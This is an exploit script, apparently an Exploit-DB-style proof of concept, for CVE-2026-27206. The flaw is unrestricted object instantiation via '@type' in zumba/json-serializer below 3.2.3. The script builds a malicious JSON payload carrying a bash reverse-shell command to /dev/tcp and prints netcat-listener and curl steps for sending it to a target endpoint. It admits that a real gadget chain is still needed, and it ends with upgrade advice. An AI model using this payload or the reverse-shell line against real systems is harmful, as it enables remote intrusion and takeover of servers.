#!/usr/bin/env python3 # Exploit Title: zumba/json-serializer zumba/json-serializer < 3.2.3 RCE # CVE: CVE-2026-27206 # Date: 2026-02-24 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://github.com/zumba/json-serializer # Software Link: https://github.com/zumba/json-serializer # Affected: zumba/json-serializer < 3.2.3 # Tested on: PHP 8.1 / 8.2 # Category: Remote Code Execution # Platform: PHP # Exploit Type: Remote # CVSS: 8.1 (HIGH) # CWE: CWE-502 (Deserialization of Untrusted Data) # Description: Unrestricted PHP object instantiation via @type in JsonSerializer::unserialize() allowing arbitrary class creation and potential code execution via magic methods / gadget chains # Fixed in: 3.2.3 # Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py http://example.com/api/unserialize --lhost 192.168.1.100 --lport 4444 # # Notes: # • This script generates and shows a malicious payload. # • Actual exploitation requires: # 1. An endpoint that accepts JSON and passes it directly to JsonSerializer::unserialize() # 2. A usable POP gadget chain present in the target application or its dependencies # • Without a gadget chain this only demonstrates object injection (no RCE). # print(""" ____ _____ ___ _ _ ___ ___ ___ / ___| | ____| / _ \ | | | | / _ \ / _ \ / _ \ | | | _| | | | | | |_| | | | | | | | | | | | | |___ | |___ | |_| | | _ | | |_| | |_| | |_| | \____| |_____| \___/ |_| |_| \___/ \___/ \___/ CVE-2026-27206 – Proof of Concept ──────────────────────────────────── Author : Mohammed Idrees Banyamer Country : Jordan Instagram : @banyamer_security Date : 2026-02-24 """) import argparse import json import sys def generate_payload(lhost, lport): # Example reverse shell command (modify for your target OS / needs) revshell_cmd = ( f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"" ) # This is a DEMONSTRATION payload. # In real attacks you need a valid gadget chain (Monolog, Symfony, Laravel, etc.) payload = { "@type": "RCEGadget", "cmd": revshell_cmd } return json.dumps(payload, separators=(',', ':')) def main(): parser = argparse.ArgumentParser(description="CVE-2026-27206 Proof of Concept - Payload Generator") parser.add_argument("target", help="Target URL that accepts JSON input (for display only)") parser.add_argument("--lhost", required=True, help="Your IP address for reverse shell") parser.add_argument("--lport", required=True, help="Port to listen on") args = parser.parse_args() print(f"[*] Target URL (info only): {args.target}") print(f"[*] Listener: {args.lhost}:{args.lport}") print() malicious_json = generate_payload(args.lhost, args.lport) print("[+] Generated malicious JSON payload:") print("──────────────────────────────────────────────────────────────────────────────") print(malicious_json) print("──────────────────────────────────────────────────────────────────────────────") print() print("[!] How to use this payload:") print(" 1. Start a listener: nc -lvnp", args.lport) print(" 2. POST the JSON above to an endpoint that uses JsonSerializer::unserialize()") print(" Example (curl):") print(f" curl -X POST {args.target} \\") print(" -H 'Content-Type: application/json' \\") print(" -d '" + malicious_json.replace("'", "'\\''") + "'") print() print("[!] Important:") print(" This payload only works if the application:") print(" • Uses vulnerable zumba/json-serializer (< 3.2.3)") print(" • Does NOT call setAllowedClasses()") print(" • Contains a POP chain that triggers code execution from the crafted object") print() print(" Without a gadget chain → only object injection (no RCE)") print(" Upgrade to >= 3.2.3 and use setAllowedClasses([]) or a whitelist") if __name__ == "__main__": if len(sys.argv) == 1: print("Error: Missing arguments. Use --help for usage.\n") sys.exit(1) main()